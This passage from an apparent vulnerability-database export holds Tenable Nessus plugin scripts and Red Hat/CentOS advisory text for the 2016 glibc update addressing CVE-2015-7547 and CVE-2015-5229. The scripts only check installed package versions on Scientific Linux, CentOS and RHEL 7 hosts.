'monstartup: out of memory'. The\n bug has been corrected and applications compiled for\n profiling now start correctly.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1602&L=scientific-linux-errata&F=&S=&P=15470\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3676f945\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\nif (\"x86_64\" >!< cpu) audit(AUDIT_ARCH_NOT, \"x86_64\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-debuginfo-common-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-debuginfo / glibc-debuginfo-common / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-06T09:30:30", "description": "Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 37, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "CentOS 7 : glibc (CESA-2016:0176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2016-02-17T00:00:00", "cpe": ["p-cpe:/a:centos:centos:glibc-common", "p-cpe:/a:centos:centos:nscd", "cpe:/o:centos:centos:7", "p-cpe:/a:centos:centos:glibc-utils", "p-cpe:/a:centos:centos:glibc-devel", "p-cpe:/a:centos:centos:glibc-static", "p-cpe:/a:centos:centos:glibc-headers", "p-cpe:/a:centos:centos:glibc"], "id": "CENTOS_RHSA-2016-0176.NASL", "href": "https://www.tenable.com/plugins/nessus/88758", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0176 and \n# CentOS Errata and Security Advisory 2016:0176 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88758);\n script_version(\"2.22\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/04\");\n\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0176\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n script_xref(name:\"IAVA\", value:\"2016-A-0053\");\n\n script_name(english:\"CentOS 7 : glibc (CESA-2016:0176)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote CentOS host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n # https://lists.centos.org/pipermail/centos-announce/2016-February/021672.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?0f51dca3\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected glibc packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2015-7547\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:centos:centos:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:centos:centos:7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"CentOS Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/CentOS/release\", \"Host/CentOS/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/CentOS/release\");\nif (isnull(release) || \"CentOS\" >!< release) audit(AUDIT_OS_NOT, \"CentOS\");\nos_ver = pregmatch(pattern: \"CentOS(?: Linux)? release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"CentOS\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"CentOS 7.x\", \"CentOS \" + os_ver);\n\nif (!get_kb_item(\"Host/CentOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"CentOS\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-devel-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-headers-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-static-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"glibc-utils-2.17-106.el7_2.4\")) flag++;\nif (rpm_check(release:\"CentOS-7\", cpu:\"x86_64\", reference:\"nscd-2.17-106.el7_2.4\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glibc / glibc-common / glibc-devel / glibc-headers / glibc-static / etc\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T05:35:29", "description": "Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.", "edition": 37, "cvss3": {"score": 8.1, "vector": "AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-02-17T00:00:00", "title": "RHEL 7 : glibc (RHSA-2016:0176)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2015-5229", "CVE-2015-7547"], "modified": "2021-04-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:glibc-static", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:glibc-utils", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:glibc", "p-cpe:/a:redhat:enterprise_linux:glibc-common", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:glibc-devel", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:nscd", "cpe:/o:redhat:enterprise_linux:7.3", "cpe:/o:redhat:enterprise_linux:7.2", "p-cpe:/a:redhat:enterprise_linux:glibc-headers", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo", "p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common"], "id": "REDHAT-RHSA-2016-0176.NASL", "href": "https://www.tenable.com/plugins/nessus/88785", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0176. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88785);\n script_version(\"2.23\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2015-5229\", \"CVE-2015-7547\");\n script_xref(name:\"RHSA\", value:\"2016:0176\");\n script_xref(name:\"TRA\", value:\"TRA-2017-08\");\n\n script_name(english:\"RHEL 7 : glibc (RHSA-2016:0176)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glibc packages that fix two security issues and two bugs are\nnow available for Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Critical\nsecurity impact. Common Vulnerability Scoring System (CVSS) base\nscores, which give detailed severity ratings, are available for each\nvulnerability from the CVE links in the References section.\n\nThe glibc packages provide the standard C libraries (libc), POSIX\nthread libraries (libpthread), standard math libraries (libm), and the\nname service cache daemon (nscd) used by multiple programs on the\nsystem. Without these libraries, the Linux system cannot function\ncorrectly.\n\nA stack-based buffer overflow was found in the way the libresolv\nlibrary performed dual A/AAAA DNS queries. A remote attacker could\ncreate a specially crafted DNS response which could cause libresolv to\ncrash or, potentially, execute code with the permissions of the user\nrunning the library. Note: this issue is only exposed when libresolv\nis called from the nss_dns NSS service module. (CVE-2015-7547)\n\nIt was discovered that the calloc implementation in glibc could return\nmemory areas which contain non-zero bytes. This could result in\nunexpected application behavior such as hangs or crashes.\n(CVE-2015-5229)\n\nThe CVE-2015-7547 issue was discovered by the Google Security Team and\nRed Hat. Red Hat would like to thank Jeff Layton for reporting the\nCVE-2015-5229 issue.\n\nThis update also fixes the following bugs :\n\n* The existing implementation of the 'free' function causes all memory\npools beyond the first to return freed memory directly to the\noperating system as quickly as possible. This can result in\nperformance degradation when the rate of free calls is very high. The\nfirst memory pool (the main pool) does provide a method to rate limit\nthe returns via M_TRIM_THRESHOLD, but this method is not available to\nsubsequent memory pools.\n\nWith this update, the M_TRIM_THRESHOLD method is extended to apply to\nall memory pools, which improves performance for threads with very\nhigh amounts of free calls and limits the number of 'madvise' system\ncalls. The change also increases the total transient memory usage by\nprocesses because the trim threshold must be reached before memory can\nbe freed.\n\nTo return to the previous behavior, you can either set\nM_TRIM_THRESHOLD using the 'mallopt' function, or set the\nMALLOC_TRIM_THRESHOLD environment variable to 0. (BZ#1298930)\n\n* On the little-endian variant of 64-bit IBM Power Systems (ppc64le),\na bug in the dynamic loader could cause applications compiled with\nprofiling enabled to fail to start with the error 'monstartup: out of\nmemory'. The bug has been corrected and applications compiled for\nprofiling now start correctly. (BZ#1298956)\n\nAll glibc users are advised to upgrade to these updated packages,\nwhich contain backported patches to correct these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0176\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-5229\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2015-7547\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.tenable.com/security/research/tra-2017-08\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-debuginfo-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-static\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:glibc-utils\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:nscd\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/18\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/02/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/02/17\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0176\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"glibc-common-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-debuginfo-common-2.17-106.el7_2.4\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"glibc-devel-2.17-106.el7_2.4\")) flag++;\n\n if 